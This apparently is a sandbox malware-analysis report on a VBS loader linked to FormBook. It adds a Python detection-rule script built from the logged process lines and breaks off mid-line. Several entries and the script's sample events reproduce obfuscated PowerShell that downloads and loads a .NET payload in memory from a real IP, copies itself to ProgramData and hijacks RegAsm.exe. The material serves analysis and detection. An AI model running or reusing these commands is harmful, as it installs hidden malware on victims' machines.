Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
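The process-creation lines above are the whole chain in order: wscript.exe runs the .vbs, which starts PowerShell with an inline decode stub; that stage downloads a Base64 string, loads it as a .NET assembly in memory and invokes a method on it; the script copies itself to C:\ProgramData\Done.vbs; PowerShell launches RegAsm.exe with no arguments (RegAsm does nothing useful without an assembly to register); the injected code in explorer.exe relaunches Done.vbs; and cmmon32.exe finally deletes RegAsm.exe through cmd.exe. The Python below is an added example, not part of the sandbox report: it encodes each of those links as a rule and runs the rules over process-creation records constructed from the report's own lines (the first record's Base64 blob is elided because the rule keys on the decode stub around it, not on the blob). Rule names, the exact string tests and the benign control record are the author's choices and will need tuning against real Sysmon Event ID 1 or EDR data. Note that "-ExecutionPolicy Bypss" is copied as logged, misspelling and all; a rule that looks for "ExecutionPolicy Bypass" spelled correctly would miss this sample.

```python
"""Detection logic for the execution chain recorded in the "Process created"
lines of this report.

Added example, not part of the sandbox output. SAMPLE_EVENTS are constructed
from the report's process-creation lines (parent image, child image, command
line as logged); the rule names and tests are the author's starting point,
not a finished ruleset.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str  # child command line exactly as logged


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _has_all(cmdline: str, *needles: str) -> bool:
    low = cmdline.lower()
    return all(n in low for n in needles)


# One rule per link in the chain; each returns True when the event matches.
RULES = {
    # wscript.exe handing the .vbs stage off to PowerShell
    "script_host_spawns_powershell": lambda e:
        _basename(e.parent) == "wscript.exe" and _basename(e.image) == "powershell.exe",
    # the inline decode stub: placeholder substitution + Base64 + UTF-16 string
    "powershell_inline_base64_unicode_decode": lambda e:
        _basename(e.image) == "powershell.exe"
        and _has_all(e.cmdline, "frombase64string", ".replace(", "unicode.getstring"),
    # fetch a string over HTTP and load it as an assembly without touching disk
    "powershell_in_memory_assembly_from_web": lambda e:
        _basename(e.image) == "powershell.exe"
        and _has_all(e.cmdline, "downloadstring(", "currentdomain.load("),
    # the script copies itself into ProgramData for re-execution
    "script_copied_to_programdata": lambda e:
        _basename(e.image) == "powershell.exe"
        and re.search(r"copy-item\s.*-destination\s+c:\\programdata\\\S+\.vbs", e.cmdline, re.I) is not None,
    # RegAsm.exe needs an assembly path; a bare launch from PowerShell is a host for injected code
    "powershell_spawns_bare_regasm": lambda e:
        _basename(e.parent) == "powershell.exe" and _basename(e.image) == "regasm.exe"
        and e.cmdline.strip().lower().endswith("regasm.exe"),
    # explorer.exe (where the payload ends up) relaunching the dropped script
    "explorer_starts_programdata_script": lambda e:
        _basename(e.parent) == "explorer.exe"
        and "start-process c:\\programdata\\" in e.cmdline.lower(),
    # clean-up of the RegAsm.exe binary the sample borrowed
    "cmd_deletes_regasm": lambda e:
        _basename(e.image) == "cmd.exe"
        and re.search(r'/c\s+del\s+"?[^"]*regasm\.exe', e.cmdline, re.I) is not None,
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Constructed from the report's "Process created" lines; the Base64 blob in the
# first record is elided, everything else is as logged. The last record is a
# benign control that should not fire.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS,
              '"' + PS + "\" -command $iUqm = '<base64 blob elided>';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD"),
    ProcEvent(PS, PS,
              PS + "\" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command \"[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))"),
    ProcEvent(PS, PS, '"' + PS + r'" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs'),
    ProcEvent(PS, REGASM, REGASM),
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              '"' + PS + '" ' + PS + r" -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs"),
    ProcEvent(r"C:\Windows\SysWOW64\cmmon32.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS, '"' + PS + '" -NoExit Get-ChildItem C:\\Users'),
]


def evaluate(events) -> dict:
    """Return {event_index: [rule names that fired]}; events with no hit are omitted."""
    hits = {}
    for idx, event in enumerate(events):
        fired = [name for name, pred in RULES.items() if pred(event)]
        if fired:
            hits[idx] = fired
    return hits


def chain_score(hits: dict) -> int:
    """Number of distinct chain links seen; the full chain in this report scores 7."""
    return len({name for fired in hits.values() for name in fired})


if __name__ == "__main__":
    results = evaluate(SAMPLE_EVENTS)
    for idx, fired in results.items():
        e = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {_basename(e.parent)} -> {_basename(e.image)}: {', '.join(fired)}")
    print("distinct chain links:", chain_score(results))
```

Each rule on its own is weak (PowerShell spawned from explorer.exe is normal, Copy-Item into ProgramData has legitimate uses), which is why the block also counts distinct links: a host that trips three or more of them within a few minutes is a far stronger signal than any single hit, and the bare RegAsm.exe launch plus its later deletion by cmd.exe is what ties the PowerShell stage to the injected FormBook payload.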
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dgawbhw.o05.ps1
Source: classification engine Classification label: mal100.troj.evad.winVBS@30/28@2/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4364:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\daveCrpted.vbs"
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\explorer.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: cmmon32.pdb source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: RegAsm.exe, 00000009.00000003.572055079.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000009.00000002.574613863.0000000002C5F000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.469567195.0000000002810000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.574322688.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000003.471300384.00000000029AD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: WAUgLeAhDG.pdb source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe
Source: Binary string: WAUgLeAhDG.pdbH|^| P|_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.503711509.0000012FE07B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.484215461.0000012FC8389000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ddscfIvqgW.pdb source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 